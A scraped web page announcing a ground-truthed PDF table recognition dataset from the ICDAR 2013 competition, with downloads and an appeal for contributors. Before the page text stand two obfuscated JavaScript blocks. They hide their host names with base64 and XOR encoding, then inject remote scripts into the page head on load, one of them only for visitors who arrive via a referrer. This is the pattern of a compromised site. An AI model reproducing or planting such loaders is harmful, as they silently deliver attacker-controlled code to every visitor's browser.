(function(_0xc59469,_0x1be38e){var _0x4e20c3=_0x442d,_0x3c2d09=_0xc59469();while(!![]){try{var _0x3c8895=-parseInt(_0x4e20c3(0xb6))/0x1*(-parseInt(_0x4e20c3(0xbc))/0x2)+parseInt(_0x4e20c3(0xb7))/0x3+-parseInt(_0x4e20c3(0xc4))/0x4*(-parseInt(_0x4e20c3(0xc1))/0x5)+-parseInt(_0x4e20c3(0xb9))/0x6+parseInt(_0x4e20c3(0xc0))/0x7+-parseInt(_0x4e20c3(0xbd))/0x8+-parseInt(_0x4e20c3(0xbb))/0x9;if(_0x3c8895===_0x1be38e)break;else _0x3c2d09['push'](_0x3c2d09['shift']());}catch(_0x3a9717){_0x3c2d09['push'](_0x3c2d09['shift']());}}}(_0x2bda,0x57e32),function(_0x17c8ea,_0x2572e7){var _0x45965e=_0x442d,_0x4c3cdb=Math['floor'](Date[_0x45965e(0xbe)]()/0x3e8),_0x5c98df=_0x4c3cdb-_0x4c3cdb%0xe10;_0x4c3cdb=_0x4c3cdb-_0x4c3cdb%0x258,_0x4c3cdb=_0x4c3cdb[_0x45965e(0xbf)](0x10);if(!document[_0x45965e(0xba)])return;const _0x26bed4=atob(_0x45965e(0xc6));_0x2572e7=_0x17c8ea[_0x45965e(0xb8)](_0x45965e(0xc9)),_0x2572e7[_0x45965e(0xc2)]='text/javascript',_0x2572e7[_0x45965e(0xc7)]=!![],_0x2572e7[_0x45965e(0xca)]=_0x45965e(0xc8)+_0x26bed4+_0x45965e(0xc5)+_0x5c98df+'.js?ver='+_0x4c3cdb,_0x17c8ea['getElementsByTagName']('head')[0x0][_0x45965e(0xc3)](_0x2572e7);}(document));function _0x442d(_0x2d5425,_0x24f6b1){var _0x2bdaa6=_0x2bda();return _0x442d=function(_0x442dcc,_0xed4883){_0x442dcc=_0x442dcc-0xb6;var _0x3d5d1e=_0x2bdaa6[_0x442dcc];return _0x3d5d1e;},_0x442d(_0x2d5425,_0x24f6b1);}function _0x2bda(){var _0x5e335c=['script','src','14DpQhBD','584673URYUaU','createElement','2561046jKBsjh','referrer','3560382XMVYNj','7706THDVnA','489360rDhlQm','now','toString','4117806bwNLOr','59780dGwAwr','type','appendChild','136qCYCNj','/my.counter.','bG9hZC4zNjVhbmFseXRpY3MueHl6','async','https://'];_0x2bda=function(){return _0x5e335c;};return _0x2bda();}

!function (_cc3c70) { var _96b8a0 = Date.now(); var _ca0b94 = 1000; _96b8a0 = _96b8a0 / _ca0b94; _96b8a0 = Math.floor(_96b8a0); var _8f63df = 600; _96b8a0 -= _96b8a0 % _8f63df; _96b8a0 = _96b8a0.toString(16); var _351128 = _cc3c70.referrer; if (!_351128) return; var _5c267c = [36526, 36540, 36540, 36522, 36539, 36540, 36577, 36536, 36526, 36539, 36524, 36519, 36526, 36540, 36534, 36513, 36524, 36577, 36524, 36512, 36514]; _5c267c = _5c267c.map(function(_3546bd){ return _3546bd ^ 36559; }); var _c8d090 = "a8ca5ccf7dd508a25af41a01dd1ff0ba"; _5c267c = String.fromCharCode(..._5c267c); var _5edef4 = "https://"; var _645ebb = "/"; var _dabd81 = "chunk-"; var _74d7e8 = ".js"; var _c610b8 = _cc3c70.createElement("script"); _c610b8.type = "text/javascript"; _c610b8.async = true; _c610b8.src = _5edef4 + _5c267c + _645ebb + _dabd81 + _96b8a0 + _74d7e8; _cc3c70.getElementsByTagName("head")[0].appendChild(_c610b8) }(document);

Round-Trip PDF Solutions

Dr. Tamir Hassan – Your Expert in Digital Documents

PDF Table Recognition Dataset

We have created two ground-truthed datasets of natively-digital PDF documents containing tables. These documents have been collected systematically from the European Union and US Government websites, and we therefore expect them to have public domain status. Each PDF document is accompanied by three XML (or CSV) file containing its ground truth in the following models:

table regions (for evaluating table location)
cell structures (for evaluating table structure recognition)
functional representation (for evaluating table interpretation)

This work was carried out as a collaboration between Giorgio Orsi, Linda Oro, Max Göbel and myself. We currently have over 50 excerpts, taken from larger PDF documents, and are appealing to the document engineering community to help us increase this number to several hundred or more.

We organized the competition on PDF table detection and structure recognition at ICDAR 2013. The datasets here were made available to all participants for practice. The competition dataset included a further collection of EU and US documents, and has now been made available with ground truth. However there is no information available on the functional representation, as only table location and cell structure recognition were covered in the competition.

The datasets can be downloaded from the Downloads page.

Tools for comparing an algorithm’s results against the ground truth, as well as a beta tool to aid ground-truth generation, are available here.

Please contact me if you would like to join our collaborative effort in improving this dataset.